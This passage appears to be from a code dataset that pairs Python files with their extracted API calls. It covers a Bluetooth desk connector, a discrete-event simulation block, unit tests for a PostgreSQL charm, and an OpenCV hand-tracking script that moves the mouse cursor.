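        # times, keeping the last error so it can be re-raised on failure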
for _ in range(self.MAX_CONNECTION_ATTEMPTS):
try:
self._peripheral.connect(device_addr, ADDR_TYPE_RANDOM)
except BTLEException as e:
print("Connection failed: " + str(e))
sleep(0.3)
error = e
continue
else:
connected = True
break
        if not connected:
raise error
self._desk = factory(self._peripheral, device_addr)
if self._desk is None:
raise Exception("Device is not supported")
@property
def is_connected(self):
        return self.desk is not None and self.desk.position is not None
@property
def desk(self) -> DefaultDesk:
return self._desk
|
[
"bluepy.btle.Scanner",
"time.sleep",
"bluepy.btle.Peripheral"
] |
[((298, 307), 'bluepy.btle.Scanner', 'Scanner', ([], {}), '()\n', (305, 307), False, 'from bluepy.btle import Scanner, Peripheral, ADDR_TYPE_RANDOM, DefaultDelegate, ScanEntry, BTLEException\n'), ((335, 347), 'bluepy.btle.Peripheral', 'Peripheral', ([], {}), '()\n', (345, 347), False, 'from bluepy.btle import Scanner, Peripheral, ADDR_TYPE_RANDOM, DefaultDelegate, ScanEntry, BTLEException\n'), ((946, 956), 'time.sleep', 'sleep', (['(0.3)'], {}), '(0.3)\n', (951, 956), False, 'from time import sleep\n')]
|
"""seize process release"""
from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue
from casymda.blocks.block_components import VisualizableBlock
class SeizeProcessRelease(VisualizableBlock):
"""entities in this block follow the process:
request resource, be processed, release resource"""
def __init__(
self, env, name, xy=None, ways=None, process_time=1.0, resource_capacity=1
):
super().__init__(env, name, xy=xy, ways=ways)
self.resource = NamedResource(self.env, "resource", capacity=resource_capacity)
self.receiver = Receiver(self.env)
self.seizer = ResourceSeizeQueue(
env, self.name + "_seizer", resource=self.resource
)
self.seizer.successors.append(self.receiver)
self.processor = Delay(env, self.name + "_processor", process_time=process_time)
self.processor.successors.append(self.receiver)
self.releaser = ResourceRelease(
env, self.name + "_releaser", resource=self.resource
)
self.releaser.successors.append(self.receiver)
def actual_processing(self, entity):
yield self.env.process(self.seizer.process_entity(entity))
yield self.env.process(self.processor.process_entity(entity))
yield self.env.process(self.releaser.process_entity(entity))
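# The three inner blocks are chained manually (seize -> process -> release);
# each hands the entity back to the shared Receiver below instead of a real
# successor block.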
class Receiver:
"""receiver class to act as successor for inner blocks"""
def __init__(self, env):
self.env = env
self.block_resource = NamedResource(env, "receiver_resource", capacity=1)
def process_entity(self, entity):
"""just release the resource"""
yield self.block_resource.release(entity.block_resource_request)
|
[
"casymda.blocks.NamedResource",
"casymda.blocks.Delay",
"casymda.blocks.ResourceSeizeQueue",
"casymda.blocks.ResourceRelease"
] |
[((517, 580), 'casymda.blocks.NamedResource', 'NamedResource', (['self.env', '"""resource"""'], {'capacity': 'resource_capacity'}), "(self.env, 'resource', capacity=resource_capacity)\n", (530, 580), False, 'from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue\n'), ((648, 718), 'casymda.blocks.ResourceSeizeQueue', 'ResourceSeizeQueue', (['env', "(self.name + '_seizer')"], {'resource': 'self.resource'}), "(env, self.name + '_seizer', resource=self.resource)\n", (666, 718), False, 'from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue\n'), ((819, 882), 'casymda.blocks.Delay', 'Delay', (['env', "(self.name + '_processor')"], {'process_time': 'process_time'}), "(env, self.name + '_processor', process_time=process_time)\n", (824, 882), False, 'from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue\n'), ((963, 1032), 'casymda.blocks.ResourceRelease', 'ResourceRelease', (['env', "(self.name + '_releaser')"], {'resource': 'self.resource'}), "(env, self.name + '_releaser', resource=self.resource)\n", (978, 1032), False, 'from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue\n'), ((1521, 1572), 'casymda.blocks.NamedResource', 'NamedResource', (['env', '"""receiver_resource"""'], {'capacity': '(1)'}), "(env, 'receiver_resource', capacity=1)\n", (1534, 1572), False, 'from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue\n')]
|
# Copyright 2021 Canonical Ltd.
# See LICENSE file for licensing details.
import re
import subprocess
import unittest
from unittest.mock import Mock, patch
from charms.operator_libs_linux.v0 import apt
from ops.model import ActiveStatus, BlockedStatus, WaitingStatus
from ops.testing import Harness
from charm import PostgresqlOperatorCharm
from tests.helpers import patch_network_get
class TestCharm(unittest.TestCase):
@patch_network_get(private_address="1.1.1.1")
def setUp(self):
self._peer_relation = "postgresql-replicas"
self._postgresql_container = "postgresql"
self._postgresql_service = "postgresql"
self.harness = Harness(PostgresqlOperatorCharm)
self.addCleanup(self.harness.cleanup)
self.harness.begin()
self.charm = self.harness.charm
@patch("charm.PostgresqlOperatorCharm._install_pip_packages")
@patch("charm.PostgresqlOperatorCharm._install_apt_packages")
@patch("charm.Patroni.inhibit_default_cluster_creation")
def test_on_install(
self, _inhibit_default_cluster_creation, _install_apt_packages, _install_pip_packages
):
# Test without adding Patroni resource.
self.charm.on.install.emit()
# Assert that the needed calls were made.
_inhibit_default_cluster_creation.assert_called_once()
_install_apt_packages.assert_called_once()
# Assert that the needed calls were made.
_install_pip_packages.assert_not_called()
# Assert the status set by the event handler.
self.assertTrue(isinstance(self.harness.model.unit.status, BlockedStatus))
# Add an empty file as Patroni resource just to check that the correct calls were made.
self.harness.add_resource("patroni", "")
self.charm.on.install.emit()
_install_pip_packages.assert_called_once()
# Assert the status set by the event handler.
self.assertTrue(isinstance(self.harness.model.unit.status, WaitingStatus))
@patch("charm.PostgresqlOperatorCharm._install_pip_packages")
@patch("charm.PostgresqlOperatorCharm._install_apt_packages")
@patch("charm.Patroni.inhibit_default_cluster_creation")
def test_on_install_apt_failure(
self, _inhibit_default_cluster_creation, _install_apt_packages, _install_pip_packages
):
# Mock the result of the call.
_install_apt_packages.side_effect = apt.PackageNotFoundError
# Trigger the hook.
self.charm.on.install.emit()
# Assert that the needed calls were made.
_inhibit_default_cluster_creation.assert_called_once()
_install_apt_packages.assert_called_once()
_install_pip_packages.assert_not_called()
self.assertTrue(isinstance(self.harness.model.unit.status, BlockedStatus))
@patch("charm.PostgresqlOperatorCharm._install_pip_packages")
@patch("charm.PostgresqlOperatorCharm._install_apt_packages")
@patch("charm.Patroni.inhibit_default_cluster_creation")
def test_on_install_pip_failure(
self, _inhibit_default_cluster_creation, _install_apt_packages, _install_pip_packages
):
# Mock the result of the call.
_install_pip_packages.side_effect = subprocess.CalledProcessError(
cmd="pip3 install patroni", returncode=1
)
# Add an empty file as Patroni resource just to check that the correct calls were made.
self.harness.add_resource("patroni", "")
self.charm.on.install.emit()
# Assert that the needed calls were made.
_inhibit_default_cluster_creation.assert_called_once()
_install_apt_packages.assert_called_once()
_install_pip_packages.assert_called_once()
self.assertTrue(isinstance(self.harness.model.unit.status, BlockedStatus))
def test_on_leader_elected(self):
# Assert that there is no password in the peer relation.
self.harness.add_relation(self._peer_relation, self.charm.app.name)
self.assertIsNone(self.charm._peers.data[self.charm.app].get("postgres-password", None))
# Check that a new password was generated on leader election.
self.harness.set_leader()
password = self.charm._peers.data[self.charm.app].get("postgres-password", None)
self.assertIsNotNone(password)
# Trigger a new leader election and check that the password is still the same.
self.harness.set_leader(False)
self.harness.set_leader()
self.assertEqual(
self.charm._peers.data[self.charm.app].get("postgres-password", None), password
)
@patch("charm.Patroni.bootstrap_cluster")
@patch(
"charm.PostgresqlOperatorCharm._replication_password", return_value="fake-replication-pw"
)
@patch("charm.PostgresqlOperatorCharm._get_postgres_password", return_value=None)
def test_on_start(self, _get_postgres_password, _replication_password, _bootstrap_cluster):
# Test before the passwords are generated.
self.charm.on.start.emit()
_bootstrap_cluster.assert_not_called()
self.assertTrue(isinstance(self.harness.model.unit.status, WaitingStatus))
# Mock the generated superuser password.
_get_postgres_password.return_value = "<PASSWORD>"
# Mock cluster start success values.
_bootstrap_cluster.side_effect = [False, True]
# Test for a failed cluster bootstrapping.
self.charm.on.start.emit()
_bootstrap_cluster.assert_called_once()
self.assertTrue(isinstance(self.harness.model.unit.status, BlockedStatus))
# Set an initial waiting status (like after the install hook was triggered).
self.harness.model.unit.status = WaitingStatus("fake message")
# Then test the event of a correct cluster bootstrapping.
self.charm.on.start.emit()
self.assertTrue(isinstance(self.harness.model.unit.status, ActiveStatus))
@patch("charm.Patroni.bootstrap_cluster")
@patch("charm.PostgresqlOperatorCharm._replication_password")
@patch("charm.PostgresqlOperatorCharm._get_postgres_password")
def test_on_start_after_blocked_state(
self, _get_postgres_password, _replication_password, _bootstrap_cluster
):
# Set an initial blocked status (like after the install hook was triggered).
initial_status = BlockedStatus("fake message")
self.harness.model.unit.status = initial_status
# Test for a failed cluster bootstrapping.
self.charm.on.start.emit()
_get_postgres_password.assert_not_called()
_replication_password.assert_not_called()
_bootstrap_cluster.assert_not_called()
# Assert the status didn't change.
self.assertEqual(self.harness.model.unit.status, initial_status)
@patch("charm.PostgresqlOperatorCharm._get_postgres_password")
def test_on_get_postgres_password(self, _get_postgres_password):
mock_event = Mock()
_get_postgres_password.return_value = "<PASSWORD>"
self.charm._on_get_initial_password(mock_event)
_get_postgres_password.assert_called_once()
mock_event.set_results.assert_called_once_with({"postgres-password": "<PASSWORD>"})
def test_get_postgres_password(self):
# Test for a None password.
self.harness.add_relation(self._peer_relation, self.charm.app.name)
self.assertIsNone(self.charm._get_postgres_password())
# Then test for a non empty password after leader election and peer data set.
self.harness.set_leader()
password = self.charm._get_postgres_password()
self.assertIsNotNone(password)
self.assertNotEqual(password, "")
@patch("charms.operator_libs_linux.v0.apt.add_package")
@patch("charms.operator_libs_linux.v0.apt.update")
def test_install_apt_packages(self, _update, _add_package):
mock_event = Mock()
# Mock the returns of apt-get update calls.
_update.side_effect = [
subprocess.CalledProcessError(returncode=1, cmd="apt-get update"),
None,
None,
]
# Test for problem with apt update.
with self.assertRaises(subprocess.CalledProcessError):
self.charm._install_apt_packages(mock_event, ["postgresql"])
_update.assert_called_once()
# Test with a not found package.
_add_package.side_effect = apt.PackageNotFoundError
with self.assertRaises(apt.PackageNotFoundError):
self.charm._install_apt_packages(mock_event, ["postgresql"])
_update.assert_called()
_add_package.assert_called_with("postgresql")
# Then test a valid one.
_update.reset_mock()
_add_package.reset_mock()
_add_package.side_effect = None
self.charm._install_apt_packages(mock_event, ["postgresql"])
_update.assert_called_once()
_add_package.assert_called_with("postgresql")
@patch("subprocess.call")
def test_install_pip_packages(self, _call):
# Fake pip packages.
packages = ["package1", "package2"]
_call.side_effect = [None, subprocess.SubprocessError]
        # Then test for a successful install.
self.charm._install_pip_packages(packages)
# Check that check_call was invoked with the correct arguments.
_call.assert_called_once_with(
[
"pip3",
"install",
"package1 package2",
]
)
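        # Note that the package names are passed to pip as a single
        # space-separated argument, hence the one "package1 package2" element
        # in the assertion above.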
# Assert the status set by the event handler.
self.assertFalse(isinstance(self.harness.model.unit.status, BlockedStatus))
# Then, test for an error.
with self.assertRaises(subprocess.SubprocessError):
self.charm._install_pip_packages(packages)
def test_new_password(self):
# Test the password generation twice in order to check if we get different passwords and
# that they meet the required criteria.
first_password = self.charm._new_password()
self.assertEqual(len(first_password), 16)
self.assertIsNotNone(re.fullmatch("[a-zA-Z0-9\b]{16}$", first_password))
second_password = self.charm._new_password()
self.assertIsNotNone(re.fullmatch("[a-zA-Z0-9\b]{16}$", second_password))
self.assertNotEqual(second_password, first_password)
|
[
"re.fullmatch",
"ops.testing.Harness",
"ops.model.WaitingStatus",
"ops.model.BlockedStatus",
"unittest.mock.Mock",
"unittest.mock.patch",
"tests.helpers.patch_network_get",
"subprocess.CalledProcessError"
] |
[((431, 475), 'tests.helpers.patch_network_get', 'patch_network_get', ([], {'private_address': '"""1.1.1.1"""'}), "(private_address='1.1.1.1')\n", (448, 475), False, 'from tests.helpers import patch_network_get\n'), ((825, 885), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_pip_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_pip_packages')\n", (830, 885), False, 'from unittest.mock import Mock, patch\n'), ((891, 951), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_apt_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_apt_packages')\n", (896, 951), False, 'from unittest.mock import Mock, patch\n'), ((957, 1012), 'unittest.mock.patch', 'patch', (['"""charm.Patroni.inhibit_default_cluster_creation"""'], {}), "('charm.Patroni.inhibit_default_cluster_creation')\n", (962, 1012), False, 'from unittest.mock import Mock, patch\n'), ((2002, 2062), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_pip_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_pip_packages')\n", (2007, 2062), False, 'from unittest.mock import Mock, patch\n'), ((2068, 2128), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_apt_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_apt_packages')\n", (2073, 2128), False, 'from unittest.mock import Mock, patch\n'), ((2134, 2189), 'unittest.mock.patch', 'patch', (['"""charm.Patroni.inhibit_default_cluster_creation"""'], {}), "('charm.Patroni.inhibit_default_cluster_creation')\n", (2139, 2189), False, 'from unittest.mock import Mock, patch\n'), ((2804, 2864), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_pip_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_pip_packages')\n", (2809, 2864), False, 'from unittest.mock import Mock, patch\n'), ((2870, 2930), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_apt_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_apt_packages')\n", (2875, 2930), False, 'from unittest.mock import Mock, patch\n'), ((2936, 2991), 'unittest.mock.patch', 'patch', (['"""charm.Patroni.inhibit_default_cluster_creation"""'], {}), "('charm.Patroni.inhibit_default_cluster_creation')\n", (2941, 2991), False, 'from unittest.mock import Mock, patch\n'), ((4592, 4632), 'unittest.mock.patch', 'patch', (['"""charm.Patroni.bootstrap_cluster"""'], {}), "('charm.Patroni.bootstrap_cluster')\n", (4597, 4632), False, 'from unittest.mock import Mock, patch\n'), ((4638, 4739), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._replication_password"""'], {'return_value': '"""fake-replication-pw"""'}), "('charm.PostgresqlOperatorCharm._replication_password', return_value=\n 'fake-replication-pw')\n", (4643, 4739), False, 'from unittest.mock import Mock, patch\n'), ((4754, 4839), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._get_postgres_password"""'], {'return_value': 'None'}), "('charm.PostgresqlOperatorCharm._get_postgres_password', return_value=None\n )\n", (4759, 4839), False, 'from unittest.mock import Mock, patch\n'), ((5922, 5962), 'unittest.mock.patch', 'patch', (['"""charm.Patroni.bootstrap_cluster"""'], {}), "('charm.Patroni.bootstrap_cluster')\n", (5927, 5962), False, 'from unittest.mock import Mock, patch\n'), ((5968, 6028), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._replication_password"""'], {}), "('charm.PostgresqlOperatorCharm._replication_password')\n", (5973, 
6028), False, 'from unittest.mock import Mock, patch\n'), ((6034, 6095), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._get_postgres_password"""'], {}), "('charm.PostgresqlOperatorCharm._get_postgres_password')\n", (6039, 6095), False, 'from unittest.mock import Mock, patch\n'), ((6779, 6840), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._get_postgres_password"""'], {}), "('charm.PostgresqlOperatorCharm._get_postgres_password')\n", (6784, 6840), False, 'from unittest.mock import Mock, patch\n'), ((7678, 7732), 'unittest.mock.patch', 'patch', (['"""charms.operator_libs_linux.v0.apt.add_package"""'], {}), "('charms.operator_libs_linux.v0.apt.add_package')\n", (7683, 7732), False, 'from unittest.mock import Mock, patch\n'), ((7738, 7787), 'unittest.mock.patch', 'patch', (['"""charms.operator_libs_linux.v0.apt.update"""'], {}), "('charms.operator_libs_linux.v0.apt.update')\n", (7743, 7787), False, 'from unittest.mock import Mock, patch\n'), ((8942, 8966), 'unittest.mock.patch', 'patch', (['"""subprocess.call"""'], {}), "('subprocess.call')\n", (8947, 8966), False, 'from unittest.mock import Mock, patch\n'), ((671, 703), 'ops.testing.Harness', 'Harness', (['PostgresqlOperatorCharm'], {}), '(PostgresqlOperatorCharm)\n', (678, 703), False, 'from ops.testing import Harness\n'), ((3213, 3284), 'subprocess.CalledProcessError', 'subprocess.CalledProcessError', ([], {'cmd': '"""pip3 install patroni"""', 'returncode': '(1)'}), "(cmd='pip3 install patroni', returncode=1)\n", (3242, 3284), False, 'import subprocess\n'), ((5702, 5731), 'ops.model.WaitingStatus', 'WaitingStatus', (['"""fake message"""'], {}), "('fake message')\n", (5715, 5731), False, 'from ops.model import ActiveStatus, BlockedStatus, WaitingStatus\n'), ((6336, 6365), 'ops.model.BlockedStatus', 'BlockedStatus', (['"""fake message"""'], {}), "('fake message')\n", (6349, 6365), False, 'from ops.model import ActiveStatus, BlockedStatus, WaitingStatus\n'), ((6931, 6937), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (6935, 6937), False, 'from unittest.mock import Mock, patch\n'), ((7873, 7879), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (7877, 7879), False, 'from unittest.mock import Mock, patch\n'), ((7977, 8042), 'subprocess.CalledProcessError', 'subprocess.CalledProcessError', ([], {'returncode': '(1)', 'cmd': '"""apt-get update"""'}), "(returncode=1, cmd='apt-get update')\n", (8006, 8042), False, 'import subprocess\n'), ((10085, 10137), 're.fullmatch', 're.fullmatch', (['"""[a-zA-Z0-9\x08]{16}$"""', 'first_password'], {}), "('[a-zA-Z0-9\\x08]{16}$', first_password)\n", (10097, 10137), False, 'import re\n'), ((10220, 10273), 're.fullmatch', 're.fullmatch', (['"""[a-zA-Z0-9\x08]{16}$"""', 'second_password'], {}), "('[a-zA-Z0-9\\x08]{16}$', second_password)\n", (10232, 10273), False, 'import re\n')]
|
import cv2
import numpy as np
import pyautogui
hand_hist = None
traverse_point = []
total_rectangle = 9
hand_rect_one_x = None
hand_rect_one_y = None
hand_rect_two_x = None
hand_rect_two_y = None
def rescale_frame(frame, wpercent=130, hpercent=130):
width = int(frame.shape[1] * wpercent / 100)
height = int(frame.shape[0] * hpercent / 100)
return cv2.resize(frame, (width, height), interpolation=cv2.INTER_AREA)
def contours(hist_mask_image):
gray_hist_mask_image = cv2.cvtColor(hist_mask_image, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(gray_hist_mask_image, 0, 255, 0)
cont, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
return cont
def draw_rect(frame):
rows, cols, _ = frame.shape
global total_rectangle, hand_rect_one_x, hand_rect_one_y, hand_rect_two_x, hand_rect_two_y
hand_rect_one_x = np.array(
[6 * rows / 20, 6 * rows / 20, 6 * rows / 20, 9 * rows / 20, 9 * rows / 20, 9 * rows / 20, 12 * rows / 20,
12 * rows / 20, 12 * rows / 20], dtype=np.uint32)
hand_rect_one_y = np.array(
[9 * cols / 20, 10 * cols / 20, 11 * cols / 20, 9 * cols / 20, 10 * cols / 20, 11 * cols / 20, 9 * cols / 20,
10 * cols / 20, 11 * cols / 20], dtype=np.uint32)
hand_rect_two_x = hand_rect_one_x + 10
hand_rect_two_y = hand_rect_one_y + 10
for i in range(total_rectangle):
cv2.rectangle(frame, (hand_rect_one_y[i], hand_rect_one_x[i]),
(hand_rect_two_y[i], hand_rect_two_x[i]),
(0, 255, 0), 1)
return frame
def hand_histogram(frame):
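    # Sample the nine 10x10 rectangles drawn by draw_rect into one stacked ROI
    # and build a 2-D hue/saturation histogram modelling the hand's skin tone.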
global hand_rect_one_x, hand_rect_one_y
hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
roi = np.zeros([90, 10, 3], dtype=hsv_frame.dtype)
for i in range(total_rectangle):
roi[i * 10: i * 10 + 10, 0: 10] = hsv_frame[hand_rect_one_x[i]:hand_rect_one_x[i] + 10,
hand_rect_one_y[i]:hand_rect_one_y[i] + 10]
hand_hist = cv2.calcHist([roi], [0, 1], None, [180, 256], [0, 180, 0, 256])
return cv2.normalize(hand_hist, hand_hist, 0, 255, cv2.NORM_MINMAX)
def hist_masking(frame, hist):
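    # Back-project the hand histogram onto the frame, smooth the response with
    # an elliptical kernel, threshold it, and mask out everything else.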
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
dst = cv2.calcBackProject([hsv], [0, 1], hist, [0, 180, 0, 256], 1)
disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (31, 31))
cv2.filter2D(dst, -1, disc, dst)
ret, thresh = cv2.threshold(dst, 150, 255, cv2.THRESH_BINARY)
# thresh = cv2.dilate(thresh, None, iterations=5)
thresh = cv2.merge((thresh, thresh, thresh))
return cv2.bitwise_and(frame, thresh)
def centroid(max_contour):
moment = cv2.moments(max_contour)
if moment['m00'] != 0:
cx = int(moment['m10'] / moment['m00'])
cy = int(moment['m01'] / moment['m00'])
return cx, cy
else:
return None
def farthest_point(defects, contour, centroid):
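    # Of the convexity-defect start points, return the one farthest from the
    # centroid; in practice this is usually the extended fingertip.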
if defects is not None and centroid is not None:
s = defects[:, 0][:, 0]
cx, cy = centroid
        x = np.array(contour[s][:, 0][:, 0], dtype=np.float64)
        y = np.array(contour[s][:, 0][:, 1], dtype=np.float64)
xp = cv2.pow(cv2.subtract(x, cx), 2)
yp = cv2.pow(cv2.subtract(y, cy), 2)
dist = cv2.sqrt(cv2.add(xp, yp))
dist_max_i = np.argmax(dist)
if dist_max_i < len(s):
farthest_defect = s[dist_max_i]
farthest_point = tuple(contour[farthest_defect][0])
return farthest_point
else:
return None
def draw_circles(frame, traverse_point):
if traverse_point is not None:
for i in range(len(traverse_point)):
cv2.circle(frame, traverse_point[i], int(5 - (5 * i * 3) / 100), [0, 255, 255], -1)
def manage_image_opr(frame, hand_hist):
hist_mask_image = hist_masking(frame, hand_hist)
hist_mask_image = cv2.erode(hist_mask_image, None, iterations=2)
hist_mask_image = cv2.dilate(hist_mask_image, None, iterations=2)
    contour_list = contours(hist_mask_image)
    if not contour_list:
        # No hand-like contour found in this frame; skip it.
        return
    max_cont = max(contour_list, key=cv2.contourArea)
    cnt_centroid = centroid(max_cont)
    if cnt_centroid is not None:
        cv2.circle(frame, cnt_centroid, 5, [255, 0, 255], -1)
    if max_cont is not None:
        hull = cv2.convexHull(max_cont, returnPoints=False)
        defects = cv2.convexityDefects(max_cont, hull)
        far_point = farthest_point(defects, max_cont, cnt_centroid)
        if far_point is None:
            # Defects or centroid unavailable; nothing to track this frame.
            return
        print("Centroid : " + str(cnt_centroid) + ", farthest Point : " + str(far_point))
        # use farthest_point here to drive the mouse
        puntox = far_point[0] * (1920 / 640)
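        # Map the 640x480 camera frame onto the 1920x1080 screen. The y axis
        # gets a piecewise nonlinear stretch near the top and bottom so the
        # cursor can reach the screen edges without the hand leaving the view.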
if (far_point[1])<=235:
puntoyf=(far_point[1]-(60*(1-((far_point[1]-60)/180))))*(1080/480)
elif (far_point[1])>=245:
puntoyf=(far_point[1]+(60*((far_point[1]-245)/175)))*(1080/480)
else:
puntoyf=(far_point[1])*(1080/480)
pyautogui.moveTo(puntox,puntoyf)
#######################################
cv2.circle(frame, far_point, 5, [0, 0, 255], -1)
if len(traverse_point) < 20:
traverse_point.append(far_point)
else:
traverse_point.pop(0)
traverse_point.append(far_point)
draw_circles(frame, traverse_point)
def main():
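    # Hold a hand over the green rectangles and press 'z' to capture its
    # color histogram; press ESC to quit.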
global hand_hist
is_hand_hist_created = False
capture = cv2.VideoCapture(0)
while capture.isOpened():
pressed_key = cv2.waitKey(1)
_, frame = capture.read()
frame = cv2.flip(frame, 1)
if pressed_key & 0xFF == ord('z'):
is_hand_hist_created = True
hand_hist = hand_histogram(frame)
if is_hand_hist_created:
manage_image_opr(frame, hand_hist)
else:
frame = draw_rect(frame)
cv2.imshow("Live Feed", rescale_frame(frame))
if pressed_key == 27:
break
cv2.destroyAllWindows()
capture.release()
if __name__ == '__main__':
main()
|
[
"cv2.bitwise_and",
"numpy.argmax",
"cv2.rectangle",
"cv2.normalize",
"cv2.erode",
"cv2.convexityDefects",
"cv2.subtract",
"cv2.filter2D",
"cv2.dilate",
"cv2.cvtColor",
"cv2.calcBackProject",
"cv2.destroyAllWindows",
"cv2.resize",
"cv2.circle",
"cv2.waitKey",
"cv2.calcHist",
"cv2.convexHull",
"cv2.flip",
"cv2.merge",
"cv2.add",
"cv2.getStructuringElement",
"cv2.threshold",
"cv2.moments",
"numpy.zeros",
"cv2.VideoCapture",
"numpy.array",
"cv2.findContours",
"pyautogui.moveTo"
] |
[((364, 428), 'cv2.resize', 'cv2.resize', (['frame', '(width, height)'], {'interpolation': 'cv2.INTER_AREA'}), '(frame, (width, height), interpolation=cv2.INTER_AREA)\n', (374, 428), False, 'import cv2\n'), ((489, 538), 'cv2.cvtColor', 'cv2.cvtColor', (['hist_mask_image', 'cv2.COLOR_BGR2GRAY'], {}), '(hist_mask_image, cv2.COLOR_BGR2GRAY)\n', (501, 538), False, 'import cv2\n'), ((557, 603), 'cv2.threshold', 'cv2.threshold', (['gray_hist_mask_image', '(0)', '(255)', '(0)'], {}), '(gray_hist_mask_image, 0, 255, 0)\n', (570, 603), False, 'import cv2\n'), ((626, 690), 'cv2.findContours', 'cv2.findContours', (['thresh', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (642, 690), False, 'import cv2\n'), ((880, 1054), 'numpy.array', 'np.array', (['[6 * rows / 20, 6 * rows / 20, 6 * rows / 20, 9 * rows / 20, 9 * rows / 20,\n 9 * rows / 20, 12 * rows / 20, 12 * rows / 20, 12 * rows / 20]'], {'dtype': 'np.uint32'}), '([6 * rows / 20, 6 * rows / 20, 6 * rows / 20, 9 * rows / 20, 9 *\n rows / 20, 9 * rows / 20, 12 * rows / 20, 12 * rows / 20, 12 * rows / \n 20], dtype=np.uint32)\n', (888, 1054), True, 'import numpy as np\n'), ((1087, 1264), 'numpy.array', 'np.array', (['[9 * cols / 20, 10 * cols / 20, 11 * cols / 20, 9 * cols / 20, 10 * cols / \n 20, 11 * cols / 20, 9 * cols / 20, 10 * cols / 20, 11 * cols / 20]'], {'dtype': 'np.uint32'}), '([9 * cols / 20, 10 * cols / 20, 11 * cols / 20, 9 * cols / 20, 10 *\n cols / 20, 11 * cols / 20, 9 * cols / 20, 10 * cols / 20, 11 * cols / \n 20], dtype=np.uint32)\n', (1095, 1264), True, 'import numpy as np\n'), ((1680, 1718), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2HSV'], {}), '(frame, cv2.COLOR_BGR2HSV)\n', (1692, 1718), False, 'import cv2\n'), ((1729, 1773), 'numpy.zeros', 'np.zeros', (['[90, 10, 3]'], {'dtype': 'hsv_frame.dtype'}), '([90, 10, 3], dtype=hsv_frame.dtype)\n', (1737, 1773), True, 'import numpy as np\n'), ((2011, 2074), 'cv2.calcHist', 'cv2.calcHist', (['[roi]', '[0, 1]', 'None', '[180, 256]', '[0, 180, 0, 256]'], {}), '([roi], [0, 1], None, [180, 256], [0, 180, 0, 256])\n', (2023, 2074), False, 'import cv2\n'), ((2086, 2146), 'cv2.normalize', 'cv2.normalize', (['hand_hist', 'hand_hist', '(0)', '(255)', 'cv2.NORM_MINMAX'], {}), '(hand_hist, hand_hist, 0, 255, cv2.NORM_MINMAX)\n', (2099, 2146), False, 'import cv2\n'), ((2190, 2228), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2HSV'], {}), '(frame, cv2.COLOR_BGR2HSV)\n', (2202, 2228), False, 'import cv2\n'), ((2240, 2301), 'cv2.calcBackProject', 'cv2.calcBackProject', (['[hsv]', '[0, 1]', 'hist', '[0, 180, 0, 256]', '(1)'], {}), '([hsv], [0, 1], hist, [0, 180, 0, 256], 1)\n', (2259, 2301), False, 'import cv2\n'), ((2314, 2368), 'cv2.getStructuringElement', 'cv2.getStructuringElement', (['cv2.MORPH_ELLIPSE', '(31, 31)'], {}), '(cv2.MORPH_ELLIPSE, (31, 31))\n', (2339, 2368), False, 'import cv2\n'), ((2373, 2405), 'cv2.filter2D', 'cv2.filter2D', (['dst', '(-1)', 'disc', 'dst'], {}), '(dst, -1, disc, dst)\n', (2385, 2405), False, 'import cv2\n'), ((2425, 2472), 'cv2.threshold', 'cv2.threshold', (['dst', '(150)', '(255)', 'cv2.THRESH_BINARY'], {}), '(dst, 150, 255, cv2.THRESH_BINARY)\n', (2438, 2472), False, 'import cv2\n'), ((2542, 2577), 'cv2.merge', 'cv2.merge', (['(thresh, thresh, thresh)'], {}), '((thresh, thresh, thresh))\n', (2551, 2577), False, 'import cv2\n'), ((2590, 2620), 'cv2.bitwise_and', 'cv2.bitwise_and', (['frame', 'thresh'], {}), '(frame, thresh)\n', (2605, 2620), False, 'import cv2\n'), ((2663, 
